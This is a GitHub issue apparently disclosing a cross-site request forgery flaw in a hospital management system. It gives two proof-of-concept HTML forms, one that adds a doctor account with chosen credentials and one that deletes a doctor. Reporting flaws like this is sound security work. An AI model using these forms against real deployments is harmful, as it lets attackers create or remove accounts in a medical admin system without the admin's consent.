kishan0725/Hospital-Management-System

CSRF in adding and deleting doctor

dhakalananda opened this issue · 0 comments

dhakalananda commented

Hi,

There is a site-wide CSRF vulnerability in every functionality.

Add Doctor

<html>
  <body>
    <form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
      <input type="hidden" name="doctor" value="test" />
      <input type="hidden" name="special" value="Cardiologist" />
      <input type="hidden" name="demail" value="test&#64;gmail&#46;com" />
      <input type="hidden" name="dpassword" value="testtest" />
      <input type="hidden" name="cdpassword" value="testtest" />
      <input type="hidden" name="docFees" value="123" />
      <input type="hidden" name="docsub" value="Add&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Delete Doctor

<html>
  <body>
    <form action="http://localhost/admin-panel1.php" method="POST">
      <input type="hidden" name="demail" value="testbydhakalananda&#64;gmail&#46;com" />
      <input type="hidden" name="docsub1" value="Delete&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>